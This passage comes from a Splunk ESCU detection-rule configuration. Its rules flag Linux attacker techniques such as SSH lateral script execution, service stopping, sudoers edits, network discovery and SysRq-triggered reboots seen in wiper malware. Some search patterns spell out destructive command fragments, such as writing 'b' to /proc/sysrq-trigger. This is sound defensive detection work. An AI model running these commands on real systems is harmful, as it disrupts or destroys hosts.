the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This is not a common command to be executed. Filter as needed. action.escu.creation_date = 2023-03-03 action.escu.modification_date = 2023-03-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux SSH Remote Services Script Execute - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ attempting to move laterally and download a file. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux SSH Remote Services Script Execute - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. action.notable.param.rule_title = Linux SSH Remote Services Script Execute action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ssh Processes.process IN ("*oStrictHostKeyChecking*", "*oConnectTimeout*", "*oBatchMode*") AND Processes.process IN ("*http:*","*https:*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ssh_remote_services_script_execute_filter` [ESCU - Linux Stdout Redirection To Dev Null File - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic looks for suspicious commandline that redirect the stdout or possible stderror to dev/null file. This technique was seen in cyclopsblink malware where it redirect the possible output or error while modify the iptables firewall setting of the compromised machine to hide its action from the user. This Anomaly detection is a good pivot to look further why process or user use this un common approach. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious commandline that redirect the stdout or possible stderror to dev/null file. This technique was seen in cyclopsblink malware where it redirect the possible output or error while modify the iptables firewall setting of the compromised machine to hide its action from the user. This Anomaly detection is a good pivot to look further why process or user use this un common approach. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Stdout Redirection To Dev Null File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Cyclops Blink", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ that redirect stdout to dev/null in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Linux Stdout Redirection To Dev Null File - Rule action.correlationsearch.annotations = {"analytic_story": ["Cyclops Blink", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*&>/dev/null*" by Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_stdout_redirection_to_dev_null_file_filter` [ESCU - Linux Stop Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is to detect events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is to detect events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Stop Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to stop services on endpoint $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Stop Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is to detect events that attempt to stop or clear a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.notable.param.rule_title = Linux Stop Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("systemctl", "service", "svcadm") Processes.process ="*stop*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_stop_services_filter` [ESCU - Linux Sudo OR Su Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect the execution of sudo or su command in linux operating system. The "sudo" command allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. This command is commonly abused by adversaries, malware author and red teamers to elevate privileges to the targeted host. This command can be executed by administrator for legitimate purposes or to execute process that need admin privileges, In this scenario filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect the execution of sudo or su command in linux operating system. The "sudo" command allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. This command is commonly abused by adversaries, malware author and red teamers to elevate privileges to the targeted host. This command can be executed by administrator for legitimate purposes or to execute process that need admin privileges, In this scenario filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-04 action.escu.modification_date = 2022-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Sudo OR Su Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Sudo OR Su Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("sudo", "su") OR Processes.parent_process_name IN ("sudo", "su") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_sudo_or_su_execution_filter` [ESCU - Linux Sudoers Tmp File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to looks for file creation of sudoers.tmp file cause by editing /etc/sudoers using visudo or editor in linux platform. This technique may abuse by adversaries, malware author and red teamers to gain elevated privilege to targeted or compromised host. /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to looks for file creation of sudoers.tmp file cause by editing /etc/sudoers using visudo or editor in linux platform. This technique may abuse by adversaries, malware author and red teamers to gain elevated privilege to targeted or compromised host. /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-23 action.escu.modification_date = 2021-12-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Sudoers Tmp File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Sudoers Tmp File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*sudoers.tmp*") by Filesystem.dest Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_sudoers_tmp_file_creation_filter` [ESCU - Linux System Network Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible enumeration of local network configuration. This technique is commonly used as part of recon of adversaries or threat actor to know some network information for its next or further attack. This anomaly detections may capture normal event made by administrator during auditing or testing network connection of specific host or network to network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for possible enumeration of local network configuration. This technique is commonly used as part of recon of adversaries or threat actor to know some network information for its next or further attack. This anomaly detections may capture normal event made by administrator during auditing or testing network connection of specific host or network to network. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux System Network Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Network Discovery", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux System Network Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Network Discovery", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name_list values(Processes.process) as process_list values(Processes.process_id) as process_id_list values(Processes.parent_process_id) as parent_process_id_list values(Processes.process_guid) as process_guid_list dc(Processes.process_name) as process_name_count from datamodel=Endpoint.Processes where Processes.process_name IN ("arp", "ifconfig", "ip", "netstat", "firewall-cmd", "ufw", "iptables", "ss", "route") by _time span=30m Processes.dest Processes.user | where process_name_count >=4 | `drop_dm_object_name(Processes)`| `linux_system_network_discovery_filter` [ESCU - Linux System Reboot Via System Request Key - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible execution of SysReq hack to reboot the Linux system host. This technique was seen in Awfulshred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can trigger reboot by piping out 'b' to /proc/sysrq-trigger after enabling all the functions of sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not a common way to reboot a system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1529"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for possible execution of SysReq hack to reboot the Linux system host. This technique was seen in Awfulshred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can trigger reboot by piping out 'b' to /proc/sysrq-trigger after enabling all the functions of sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not a common way to reboot a system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux System Reboot Via System Request Key - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ execute sysrq command $process$ to reboot $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux System Reboot Via System Request Key - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1529"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to look for possible execution of SysReq hack to reboot the Linux system host. This technique was seen in Awfulshred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can trigger reboot by piping out 'b' to /proc/sysrq-trigger after enabling all the functions of sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not a common way to reboot a system. action.notable.param.rule_title = Linux System Reboot Via System Request Key action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") Processes.process = "* echo b > *" Processes.process = "*/proc/sysrq-trigger" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_system_reboot_via_system_request_key_filter` [ESCU - Linux Unix Shell Enable All SysRq Functions - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for possible execution of SysReq hack to enable all functions of kernel system requests of the Linux system host. This technique was seen in AwfulShred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can be triggered by piping out bitmask '1' to /proc/sys/kernel/sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not so common shell commandline. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for possible execution of SysReq hack to enable all functions of kernel system requests of the Linux system host. This technique was seen in AwfulShred malware wiper to reboot the compromised host by using the linux magic sysreq key. This kernel configuration can be triggered by piping out bitmask '1' to /proc/sys/kernel/sysrq. This TTP detection can be a good indicator of possible suspicious processes running on the Linux host since this command is not so common shell commandline. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Unix Shell Enable All SysRq Functions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ execute sysrq command $process$ to enable all function of system request in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Unix Shell Enable All SysRq Functions - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("dash", "sudo", "bash") Processes.process = "* echo 1 > *" Processes.process = "*/proc/sys/kernel/sysrq" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_unix_shell_enable_all_sysrq_functions_filter` [ESCU - Linux Visudo Utility Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to looks for suspicious commandline that add entry to /etc/sudoers by using visudo utility tool in linux platform. This technique may abuse by adversaries, malware author and red teamers to gain elevated privilege to targeted or compromised host. /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to looks for suspicious commandline that add entry to /etc/sudoers by using visudo utility tool in linux platform. This technique may abuse by adversaries, malware author and red teamers to gain elevated privilege to targeted or compromised host. /etc/sudoers file controls who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands. The file is composed of aliases (basically variables) and user specifications (which control who can run what). action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Visudo Utility Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 16}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Visudo Utility Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 40, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = visudo by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_visudo_utility_execution_filter` [ESCU - Living Off The Land - Rule] action.escu = 0 action.escu.enabled = 1 description = The following correlation identifies a distinct amount of analytics associated with the Living Off The Land analytic story that identify potentially suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]} action.escu.data_models = ["Risk"] action.escu.eli5 = The following correlation identifies a distinct amount of analytics associated with the Living Off The Land analytic story that identify potentially suspicious behavior. action.escu.how_to_implement = To implement this correlation search a user needs to enable all detections in the Living Off The Land Analytic Story and confirm it is generating risk events. A simple search `index=risk analyticstories="Living Off The Land"` should contain events. action.escu.known_false_positives = There are no known false positive for this search, but it could contain false positives as multiple detections can trigger and not have successful exploitation. Modify the static value distinct_detection_name to a higher value. It is also required to tune analytics that are also tagged to ensure volume is never too much. action.escu.creation_date = 2022-09-09 action.escu.modification_date = 2022-09-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Living Off The Land - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - RIR - Living Off The Land - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Command and Control", "Delivery", "Installation"], "mitre_attack": ["T1105", "T1190", "T1059", "T1133"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following correlation identifies a distinct amount of analytics associated with the Living Off The Land analytic story that identify potentially suspicious behavior. action.notable.param.rule_title = RBA: Living Off The Land action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events 